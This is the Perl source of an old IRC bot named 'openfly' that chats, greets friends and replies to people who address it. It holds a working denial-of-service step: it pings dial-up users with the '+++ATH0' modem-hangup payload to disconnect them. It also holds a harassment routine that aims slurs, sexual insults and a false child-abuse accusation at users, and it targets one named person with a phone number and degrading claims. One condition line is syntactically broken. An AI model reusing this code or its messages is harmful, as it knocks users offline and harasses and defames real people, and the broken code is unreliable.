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- #!/usr/bin/perl
- # - openfly irc bot
- #
- $0 = "openfly";
- $version = "1.0";
- print "\033[31m openfly\033[0m - $version \nopenfly\\n\n";
- if ($ARGC <= 0 ) {
- print ":: Syntax: $0 <server> <port> <channel> <nick>\n";
- print ":: Example: perl $0 6667 2600 openfly\n";
- exit;
- }
- use Socket;
- $remote = $ARGV[0];
- $port = $ARGV[1];
- $channel = $ARGV[2];
- $nick = $ARGV[3];
- print ":: Attempting to connect to - $remote.\n";
- $iaddr = inet_aton($remote) or die "Error: $!";
- $paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
- $proto = getprotobyname('tcp') or die "Error: $!";
- socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
- connect(SOCK, $paddr) or die "Error: $!";
- print ":: Connected. Authenticating with server.\n";
- # fork off chatter evalutation process
- if ($pid = fork) { print ":: IO Agent Launched PID = $pid\n"; }
- else { wangchung(); exit; }
- @haha = (
- "...",
- "...",
- "?",
- "werd.",
- "brb",
- "roflmao",
- "lol",
- "dude, liquidpc sucks cock",
- "alpha owns me",
- "werd up g-dawg",
- "...",
- "jah?",
- "da da da",
- "perl is evil",
- "i wonder where binary is",
- "why are all the hits to my site either porn or windows worms?",
- "I hate school...",
- "...",
- "?",
- "!",
- "I need a job!",
- "la la la",
- "wheee",
- "2600net sucks",
- "woot!",
- "fuckin a!",
- "Damn it I wish I were a bot...",
- "where did i put those marbles...",
- "computers suck.",
- "life is such a bitch.",
- "so what's up people?",
- "we really should do something for h2k2",
- "bleh",
- "damn it nothing ever works right!",
- "ARGH!!!",
- "god i love bsd",
- "stupid irc skanks!",
- "blargh",
- "moof",
- "one of these days I am gonna code a bot to replace me." );
- $temper = $haha[ rand scalar @haha ];
- # Random Delay Times
- @timer = (
- 20, 5, 60, 300, 40, 70, 23, 40, 1000, 40,
- 90, 78, 1 );
- $times = $timer[ rand scalar @timer ];
- sleep(1);
- $msg = "USER $nick - - $nick\n";
- send(SOCK, $msg, 0) or die "Unable to send packet: $!";
- sleep(1);
- $msg = "NICK $nick\n";
- send(SOCK, $msg, 0) or die "Unable to send packet: $!";
- sleep(1);
- $msg = "JOIN #$channel\n";
- send(SOCK, $msg, 0) or die "Unable to send packet: $!";
- sleep(1);
- while (1) {
- $temper = $haha[ rand scalar @haha ];
- $msg = "PRIVMSG #$channel :$temper\n";
- sleep(5);
- for(0 .. $times) {
- $mesg = "JOIN #$nick\n";
- send(SOCK, $mesg, 0) or die "Unable to send packet: $!";
- sleep(30);
- }
- send(SOCK, $msg, 0) or die "Unable to send packet: $!";
- sleep(2);
- }
- ##############################
- # Evaluating Channel Chatter #
- ##############################
- sub wangchung() {
- $0 = "openfly - IO Agent";
- $chan = $channel;
- @friends = ( "muska", "psytek", "clorox",
- "binary", "RedHackt", "ezsmoke",
- "setient", "Arsenic", "muaddib",
- "muted", "baset", "vinyl",
- "merlin", "Wolfgame", "WolfGame", "wolfgame",
- "kozik", "vayeate", "RF", "RFmadman",
- "frogman", "godsmoke", "Justin", "khromy",
- "compudroid", "dice", "xeon", "feach",
- "osjedi", "Aevum", "krys", "shardy",
- "PHiZ", "antipent", "evlpeng",
- "warmonger", "oxidation" );
- while (1) {
- $inny = <SOCK>;
- chomp $inny;
- ($inny0, $inny1, $inny3, $inny4, $inny5) = split(/\x20/, $inny);
- ###########################
- # Speak when Spoken to... #
- ###########################
- # initialize variables
- my $done = 0;
- # print "CHANNEL :: \033[31m$chan\033[0m\n";
- my $ignore = 0;
- # nick parse... hell lets do nick host and username!
- ($trall0, $trall1) = split(/:/, $inny0);
- ($person, $hostess) = split(/!/, $trall1);
- ($usernome, $host) = split(/@/, $hostess);
- ($trall2, $trall3, $message, $trall5) = split(/:/, $inny);
- #####DEBUG SHIZZATT#####
- # print "trall0 :: \033[31m$trall0\033[0m\n";
- # print "trall1 :: \033[31m$trall1\033[0m\n";
- # print "trall2 :: \033[31m$trall2\033[0m\n";
- # print "trall3 :: \033[31m$trall3\033[0m\n";
- # print "message :: \033[31m$trall4\033[0m\n";
- # print "trall5 :: \033[31m$trall5\033[0m\n";
- # external PRIVMSG
- if ($person !~ $nick) {
- print "\033[34m<\033[0m$person\033[37m:\033[0m$inny3\033[34m>\033[0m $message\n";
- }
- # self PRIVMSG Still will be implimented in the functions gimme time
- # +++ath0 attack schema... aka blackbot function
- if ($host =~ /dial/) {
- }
- # when directly addressed by a person
- if ((($inny =~ /:$nick/i) || ($inny =~ / $nick/i)) && ($inny1 =~ /PRIVMSG/) && ($inny3 !~ $nick)) {
- if (($host =~ / && ($done == 0)) {
- $mesc = "PRIVMSG $inny3 :I don't talk to AOLers. GO GET A FUCKIN SHELL!\n";
- send(SOCK, $mesc, 0) or warn "Unable to send packet: $!";
- $done = 1;
- for (0 .. 15) {
- system("ping -p 2b2b2b415448300d -c 1 $host > /dev/null &");
- }
- }
- if ($done != 1) {
- @busi = ( "piss off... I'm busy.",
- "fuck off",
- "stfu $person",
- "don't talk to me $person",
- "go away i am coding",
- "talk to the hand biatch",
- "SHUT UP!!",
- "go fuck a kitten!",
- "Eat shit and die asshole",
- "talk to me in an hour, I gotta go pleasure $person\'s mother",
- "stop talking to me!",
- "you know you're talking to a bot right?",
- "leave me the fuck alone already CHRIST!",
- "ass",
- "hey look $person is amazed by a couple of lines of perl!",
- "don't make me kick yo ass $person",
- "Whatchoo talkin 'bout $person...",
- "uhm yah whatever ever you say faggot",
- "fuckin $person, he never shuts the fuck up",
- "$person likes to touch little kids in \"bad\" places...",
- "yo don't drop the soap in the channel $person, you got a candy asshole",
- "c'mon go get a fuckin life $person",
- "yo mama's so stupid she brought toilet paper to a craps game!",
- "fuckin amateur." );
- $busy = $busi[ rand scalar @busi ];
- $mesc = "PRIVMSG $inny3 :$busy\n";
- send(SOCK, $mesc, 0) or warn "Unable to send packet: $!";
- $done = 1;
- }
- }
- # LiquidPC Abuse
- if ((($inny0 =~ /LiquidPC/i) || ($inny0 =~ /lpc/i)) && ($done != 1)) {
- @lqdpc = ( "look there's a Gay in the room, Earl E Gay that is.",
- "call (910) 253-7418 for a good time... ask for earl",
- "LiquidPC sucks cock.",
- "LiquidPC is such a fuckin looser",
- "Hey LPC.... FUCK YOU!",
- "LPC is such a fuckin homo.",
- "Fuck you LiquidPC.",
- "Earl like a good banana dick up his Ass.",
- "Someone k-line liquidpc for the love of god.",
- "earl you fucktard" );
- $lpc = $lqdpc[ rand scalar @lqdpc ];
- $mesc = "PRIVMSG $inny3 :$lpc\n";
- send(SOCK, $mesc, 0) or warn "Unable to send packet: $!";
- }
- # Greet @friends with $salutation =P
- $seco = 0;
- for (0 .. 36) {
- if (($inny0 =~ /$friends[$seco]/) && ($inny1 =~ /JOIN/)) {
- @salute= ( "werd up", "hey", "hola", "yo", "word up", "werd",
- "werd up", "look it's", "hello", "bem vindo");
- $salutation = $salute[ rand scalar @salute ];
- $mesc = "PRIVMSG $inny3 :$salutation $friends[$seco]\n";
- send(SOCK, $mesc, 0) or warn "Unable to send packet: $!";
- }
- $seco++;
- }
- # If you're not wanted... or are...
- if ($ignore == 0) {
- if (($inny3 =~ $nick) && ($inny4 =~ ":join")) {
- $mesc = "JOIN #$inny5\n";
- send(SOCK, $mesc, 0) or warn "Unable to send packet: $!";
- $chan = $inny5;
- chomp $chan;
- $ignore = 1;
- }
- if (($inny3 =~ $nick) && ($inny4 =~ ":part")) {
- $mesc = "PART #$inny5\n";
- send(SOCK, $mesc, 0) or warn "Unable to send packet: $!";
- $chan = $nick;
- chomp $chan;
- $ignore = 1;
- }
- }
- else { $ignore = 0; }
- }
- print "SOCK is dead I am OUTTA HERE!\n\n";
- }
- ############
- # END CODE #
- ############
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